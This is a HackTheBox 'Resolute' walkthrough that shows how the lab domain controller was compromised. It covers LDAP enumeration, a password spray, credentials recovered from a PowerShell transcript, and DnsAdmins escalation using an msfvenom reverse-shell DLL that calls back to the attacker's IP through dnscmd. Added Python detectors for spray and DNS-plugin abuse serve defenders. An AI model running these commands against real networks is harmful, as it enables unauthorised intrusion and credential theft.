Resolute HackTheBox Walkthrough | Active Directory

D3athCod3
4 min read · Jun 19, 2024


Hey, fellow Hackers! Today, we’re going to dive into the Resolute HackTheBox Active Directory Machine. Let’s start scanning without wasting time :)

Scanning

Let’s start by scanning the target IP with an nmap fast scan:

nmap -F -sV 10.10.10.169

We got a bunch of open ports and the domain name megabank.local.

Let’s enumerate them one by one.

Enumeration & Gaining Shell

I started with the domain (DNS) port but found nothing, then tried listing SMB shares with smbmap, with no luck either.

Then I ran enum4linux and, in parallel, enumerated users with ldapsearch:

enum4linux 10.10.10.169
ldapsearch -x -H ldap://10.10.10.169 -D 'CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL' -b 'DC=MEGABANK,DC=LOCAL' | grep userPrincipalName | sed 's/userPrincipalName: //'

The ldapsearch output gave me a list of users, which I saved to a file named user.txt. The enum4linux output had something more interesting about the users:

a password noted against the marko account

I tried this password for the marko user, but it didn’t work :(
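The ldapsearch pipeline above only greps for one attribute. As an added example (not code from the original walkthrough), here is a small parser for the LDIF that ldapsearch prints: it collects every userPrincipalName (the user.txt list) and flags accounts whose description attribute reads like a credential note, which is the kind of finding enum4linux surfaced here. That the marko password sat in an account description is an assumption of this example; the post only says enum4linux showed it. The LDIF is constructed sample data; only the domain name and the three account names come from the post.

```python
"""Parse ldapsearch LDIF output, list userPrincipalName values and flag
user objects whose description attribute looks like it holds a password.
Added example; the LDIF below is constructed, not a dump from the box."""
import base64
import re

# Constructed sample. ldapsearch folds long values onto continuation lines
# that begin with a single space, and emits non-ASCII/binary values
# base64-encoded after a double colon; both cases are exercised here.
_B64_DESC = base64.b64encode(b"initial password: changeme").decode()
SAMPLE_LDIF = f"""\
# extended LDIF
dn: CN=marko,CN=Users,DC=MEGABANK,DC=LOCAL
objectClass: user
sAMAccountName: marko
userPrincipalName: marko@megabank.local
description: Account created. Password set to Welcome123!

dn: CN=melanie,CN=Users,DC=MEGABANK,DC=LOCAL
objectClass: user
sAMAccountName: melanie
userPrincipalName: melanie@megabank.loc
 al

dn: CN=ryan,CN=Users,DC=MEGABANK,DC=LOCAL
objectClass: user
sAMAccountName: ryan
userPrincipalName: ryan@megabank.local
description:: {_B64_DESC}

# search result
search: 2
result: 0 Success
"""

# Words that make a free-text attribute worth a human look.
PASSWORD_HINT = re.compile(r"(?i)\b(pass(word|wd)?|pwd|cred(ential)?s?)\b")


def parse_ldif(text):
    """Return one dict per entry (attribute -> list of values)."""
    entries = []
    unfolded = re.sub(r"\n ", "", text)            # join continuation lines
    for block in unfolded.split("\n\n"):
        entry = {}
        for line in block.splitlines():
            if not line or line.startswith("#"):
                continue
            attr, _, rest = line.partition(":")
            if rest.startswith(":"):               # base64-encoded value
                value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
            else:
                value = rest.strip()
            entry.setdefault(attr, []).append(value)
        if "dn" in entry:                          # skip the search:/result: trailer
            entries.append(entry)
    return entries


def user_principal_names(entries):
    """The list the post saved as user.txt."""
    return [v for e in entries for v in e.get("userPrincipalName", [])]


def flag_credential_descriptions(entries):
    """Accounts whose description reads like a credential note, the
    misuse of the description field that leaks passwords to any
    authenticated (or, on this box, anonymous) LDAP reader."""
    hits = []
    for e in entries:
        for desc in e.get("description", []):
            if PASSWORD_HINT.search(desc):
                hits.append((e.get("sAMAccountName", ["?"])[0], desc))
    return hits


if __name__ == "__main__":
    found = parse_ldif(SAMPLE_LDIF)
    print("\n".join(user_principal_names(found)))
    for account, note in flag_credential_descriptions(found):
        print(f"[!] {account}: {note}")
```

Run against a real dump (`ldapsearch ... > users.ldif`) the same two functions give an AD admin a quick audit of description fields, which is where this box's foothold came from.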

So I password-sprayed all the users with this password using crackmapexec:

crackmapexec smb 10.10.10.169 -u user.txt -p 'Welcome123!'

and found that the melanie user accepts this password :)

Using evil-winrm, I got a shell as melanie.
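A spray like the crackmapexec run above has a distinctive shape on the domain controller: one source address fails logons (event 4625, logon type 3 for SMB) against many different accounts within seconds, often followed by a single success (4624). The following detection logic is an added example, not part of the post; the events are constructed, 10.10.14.34 is the attacking host from the post, and the account names other than marko, melanie and ryan are made up.

```python
"""Detect a password spray from simplified Windows Security log events.
Added example with constructed data; not code from the original post."""
from collections import defaultdict
from datetime import datetime, timedelta

# (timestamp, event id, target account, source address) as a SIEM would
# extract them from 4625 (logon failure) and 4624 (logon success).
SAMPLE_EVENTS = [
    ("2024-06-19T10:00:01", 4625, "abigail", "10.10.14.34"),
    ("2024-06-19T10:00:02", 4625, "claire", "10.10.14.34"),
    ("2024-06-19T10:00:03", 4625, "marko", "10.10.14.34"),
    ("2024-06-19T10:00:04", 4625, "paulo", "10.10.14.34"),
    ("2024-06-19T10:00:05", 4625, "ryan", "10.10.14.34"),
    ("2024-06-19T10:00:06", 4625, "sally", "10.10.14.34"),
    ("2024-06-19T10:00:07", 4624, "melanie", "10.10.14.34"),
    # A workstation user mistyping their own password twice: not a spray.
    ("2024-06-19T10:05:00", 4625, "ryan", "10.10.10.50"),
    ("2024-06-19T10:05:30", 4625, "ryan", "10.10.10.50"),
]


def detect_password_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """Return one alert per source address that failed logons against at
    least `min_accounts` distinct accounts inside `window`, together with
    the accounts (if any) that source then logged on as within the window."""
    by_src = defaultdict(list)
    for ts, event_id, account, src in sorted(events):
        by_src[src].append((datetime.fromisoformat(ts), event_id, account))

    alerts = []
    for src, evs in by_src.items():
        failures = [(t, acct) for t, eid, acct in evs if eid == 4625]
        for i, (t0, _) in enumerate(failures):
            tried = {acct for t, acct in failures[i:] if t - t0 <= window}
            if len(tried) < min_accounts:
                continue
            succeeded = sorted({acct for t, eid, acct in evs
                                if eid == 4624 and t0 <= t <= t0 + window})
            alerts.append({"source": src, "start": t0.isoformat(),
                           "accounts_tried": len(tried), "succeeded_as": succeeded})
            break                                   # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_EVENTS):
        print(alert)
```

The distinct-account count per source is what separates a spray from ordinary failed logons, so the rule stays quiet on the second source even though it fails repeatedly. Keying on distinct accounts rather than raw failure count also explains why a one-password spray never trips a per-account lockout threshold.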

Gaining Ryan User Shell

After getting the shell I enumerated directories and searched for files but found nothing interesting, so I looked for hidden directories: I changed to the C:\ directory and ran Get-ChildItem -Force.

There I found a directory named PSTranscripts, and inside its subdirectory a file named PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt.

Reading its contents gives us the ryan user’s password :)

Then, using evil-winrm, I got a shell as ryan.

Ryan User to SYSTEM :)

While enumerating as ryan I found that the user is a member of a group named DnsAdmins.

Searching for this group turned up a number of blogs describing a privilege escalation path. Using the method from this blog, I escalated my privileges to SYSTEM.

The blog explains that members of the DnsAdmins group can make the DNS service, which runs as SYSTEM, load an arbitrary DLL with its privileges.

Steps I took for PrivEsc:

  • Crafting a malicious DLL using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.34 LPORT=4444 -f dll > shell.dll
  • Hosting the DLL with the impacket smbserver script
impacket-smbserver -smb2support d .
  • Starting a netcat listener on port 4444
nc -nvlp 4444
  • Using dnscmd.exe to point the DNS server’s plugin DLL setting at the hosted DLL, which the service will load as SYSTEM
dnscmd.exe /config /serverlevelplugindll \\10.10.14.34\d\shell.dll
  • Restarting the DNS service so that it loads the DLL
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute stop dns

SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute start dns

SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1328
FLAGS :

As soon as the service was restarted, a new connection was made on the netcat listener.
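From the blue-team side this technique leaves two independent traces plus a corroborating one: the dnscmd.exe command line (Sysmon event 1), the write to the DNS service’s ServerLevelPluginDll registry value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters (Sysmon event 13), and the DNS service stop/start that follows (System event 7036). The detection logic below is an added example, not code from the post; it runs over constructed telemetry, the field names are this example’s own simplification of the forwarded events, and the registry path is the real one.

```python
"""Detect the DnsAdmins ServerLevelPluginDll technique from simplified
Sysmon / System log events. Added example over constructed data."""
import re
from datetime import datetime, timedelta

# Constructed events. The registry write is performed by the DNS server
# process on behalf of the RPC caller, so it shows up under dns.exe / SYSTEM;
# the process-creation event is what ties the change to the ryan account.
SAMPLE_EVENTS = [
    {"time": "2024-06-19T11:00:00", "source": "Sysmon", "id": 1,
     "user": "MEGABANK\\ryan", "image": "C:\\Windows\\System32\\dnscmd.exe",
     "command_line": "dnscmd.exe /config /serverlevelplugindll \\\\10.10.14.34\\d\\shell.dll"},
    {"time": "2024-06-19T11:00:01", "source": "Sysmon", "id": 13,
     "user": "NT AUTHORITY\\SYSTEM", "image": "C:\\Windows\\System32\\dns.exe",
     "target_object": "HKLM\\System\\CurrentControlSet\\Services\\DNS\\Parameters\\ServerLevelPluginDll",
     "details": "\\\\10.10.14.34\\d\\shell.dll"},
    {"time": "2024-06-19T11:00:05", "source": "System", "id": 7036,
     "service": "DNS Server", "state": "stopped"},
    {"time": "2024-06-19T11:00:08", "source": "System", "id": 7036,
     "service": "DNS Server", "state": "running"},
    # Routine use of dnscmd by an operator (constructed): must not fire.
    {"time": "2024-06-19T11:30:00", "source": "Sysmon", "id": 1,
     "user": "MEGABANK\\dnsoperator", "image": "C:\\Windows\\System32\\dnscmd.exe",
     "command_line": "dnscmd.exe /zoneprint megabank.local"},
]

PLUGIN_VALUE = re.compile(r"\\services\\dns\\parameters\\serverlevelplugindll$", re.I)
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")          # \\host\share\...


def _dns_restarted_after(start, events, window):
    """True if a DNS Server stop is followed by a start within `window`."""
    stopped = False
    for e in events:
        if e["source"] != "System" or e["id"] != 7036 or e["service"] != "DNS Server":
            continue
        t = datetime.fromisoformat(e["time"])
        if not (start <= t <= start + window):
            continue
        if e["state"] == "stopped":
            stopped = True
        elif e["state"] == "running" and stopped:
            return True
    return False


def detect_dns_plugin_abuse(events, window=timedelta(minutes=15)):
    """Return an alert for each event that sets the DNS plugin DLL, noting
    whether the service was bounced afterwards (the step that loads it)."""
    events = sorted(events, key=lambda e: e["time"])
    alerts = []
    for e in events:
        t = datetime.fromisoformat(e["time"])
        if (e["source"] == "Sysmon" and e["id"] == 1
                and e["image"].lower().endswith("\\dnscmd.exe")
                and "/serverlevelplugindll" in e["command_line"].lower()):
            rule, severity = "dnscmd_serverlevelplugindll", "critical"
        elif (e["source"] == "Sysmon" and e["id"] == 13
              and PLUGIN_VALUE.search(e["target_object"])):
            rule = "registry_serverlevelplugindll"
            # A UNC path means the DLL is pulled from another host, which
            # is far more suspicious than a locally installed plugin.
            severity = "critical" if UNC_PATH.match(e["details"]) else "high"
        else:
            continue
        alerts.append({"rule": rule, "severity": severity, "time": e["time"],
                       "user": e["user"],
                       "dns_restarted": _dns_restarted_after(t, events, window)})
    return alerts


if __name__ == "__main__":
    for alert in detect_dns_plugin_abuse(SAMPLE_EVENTS):
        print(alert)
```

The mitigation side is simpler than the detection: on a domain controller the ServerLevelPluginDll value should normally not exist at all, so its presence (or a UNC value) is worth an alert in its own right, and DnsAdmins membership deserves the same review as Domain Admins because, as this box shows, it is effectively SYSTEM on every DNS server.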

And as usual we found root.txt in Administrator\Desktop.

BOOMM!! Resolute Solved Successfully :)
